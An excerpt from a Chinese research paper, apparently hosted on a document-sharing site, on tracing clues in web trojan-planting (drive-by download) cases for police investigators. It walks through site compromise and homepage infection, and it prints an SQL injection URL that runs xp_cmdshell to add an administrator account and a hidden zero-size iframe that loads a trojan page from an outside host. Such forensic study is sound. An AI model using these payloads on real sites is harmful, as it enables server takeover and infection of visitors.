- 1、本文档共8页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
??
?
??
网络挂马入侵流程线索调查方法研究
?
?
?
?
?
??
?
?
?
随着信息科学技术的快速发展,计算机网络已经深入到人们日常生活的每个角落。人们每天都会登陆不同的网站浏览信息。网络技术在给我们的生活带给极大便利的同时,也存在很多安全隐患。黑客人侵网站并实施挂马,受害者只要浏览了这些被挂马的网站,木马就会自动下载到受害者主机上运行。这些木马可以窃取用户在登陆窗口内输入的敏感信息,例如:用户名、密码,甚至完全控制受害者主机。可以说网页挂马对网络用户构成了严重的威胁。分析网页挂马案件的入侵流程,进而通过技术手段查找出黑客的线索(如lP地址、电子邮箱帐号、等等)对公安机关的侦查、取证工作有着重要的意义。
1网页挂马案件入侵流程及相关网络安全技术分析
网页挂马案件的入侵流程如图1所示。首先,黑客会利用网络攻击技术入侵某些存在安全漏洞的网站,从而获得这些网站的控制权。接下来,黑客会在被入侵网站的主页文件中植入_句挂马代码,从而实现网站挂马。最后,当网络中的用户浏览“被挂马”的网站时,如果用户使用的IE浏览器存在相应的安全漏洞,则木马会被植入用户主机并运行,用户主机成为受黑客控制的“肉鸡”。黑客可以盗取“肉鸡”上的敏感信息(如网银帐号),也可以控制“肉鸡”向其他主机发起DDOS攻击。
1.1入侵网站
由于大型的门户网站如“新浪”、“搜狐”等,通常具备比较严密的网络安全防御措施、难于攻破,因此黑客通常不会选择此类网站作为攻击对象。一些日访问量在3000—5000人次的中等规模网站成为黑客入侵的首选目标,例如游戏网站、政府机关、高校、公司机构的网站,等等。在入侵网站时,目前最流行的攻击技术是“SQL注入攻击”和“缓冲区溢出攻击”。
“SQL注入攻击”是由于开发网站的技术人员缺乏足够的网络安全意识,未对用户提交的参数进行严格的检查,就将参数直接提交给后台的数据库运行,这些参数里面可能包含黑客提交的恶意指令,通过在被入侵网站上执行这些指令,黑客可以达到完全控制网站的目的。例如,在lP地址为的服务器上安装了[来自WwW.L]一台电子商务网站,该网站的网页文件lookpro.asp存在“SQL注入漏洞”,黑客使用下面这条URL链接访问lookpro.asp,即可在目标服务器上建立一个名为aaa、密码为bbb的用户。http://192.168.O.l/shop-s/lookpro.asp?id=48;execmaster..xp_cmdshell”netuseraaabbb/add”。黑客就是通过这样一系列的指令达到完全控制一台服务器的目的。
“缓冲区溢出攻击”是由于应用程序未对通过网络接收到的参数的长度进行检查,就将接收到的参数直接存放到自己的缓冲区中。如果接收到的参数长度超过预留缓冲区的大小,就会导致“缓冲区溢出”。黑客通过精心构造溢出代码,可以实现完全控制一台主机的目的。
目前,很多中等规模的网站选择“SQLServer2000+ASP”的网站架构。SQLServer2000数据库通过1433端口提供远程访问服务,如果SQLServer2000数据库未及时安装补丁acute;则1433端口存在“缓冲区溢出”漏洞。黑客可以“1433端口溢出攻击”完全控制一台Weh服务器。
1.2为网站主页挂马
用户在访问网站时[来自www.lw5u.CoM],通常是先进入网站的主页,然后再通过主贞上的链接进入到自己感兴趣的页面。因此,主页是访问频率最高的页面,黑客为了达到快速传播木马的目的,通常选择主页作为挂马的对象。
下面给If-个典型的挂马代码,将这句代码加入到被挂马网站的主页文件(例如lndex.asp)的任何一处位置,即可实现网站挂马。iframesrc=”http://包含木马程序的服务器lP地址/l.html”;width=“0”height=”O”frarneborder=”O”/iframe。这是一种框架挂马方式,用户访问index.asp之后,会自动到包含木马程序的服务器上下载并浏览1.html,这个1.html会利用IE浏览器漏洞自动下载并运行木马程序(例如l.exe),由于这里将框架的高度、宽度和边框粗细均设置为O,因此受害者在浏览index.asp时不会察觉到任何变化。通过以上分析我们发现,黑客不需要将l.html和l.exe上传到被挂马网站,只须修改被挂马网站的主页文件(index.asp),即可实现网站挂马,因而具备很强的隐蔽性。
1.3植入并运行木马
当网络中的用户浏览“被挂马”网站时,如果用户使用的IE浏览器存在相应的安全漏洞,则木马会被植入用户主机并运行,用户主机成为受黑客控制的‘肉鸡”。黑客可以盗取‘肉鸡”上的敏感信息(如网银帐号),也可以控制“肉鸡”
文档评论(0)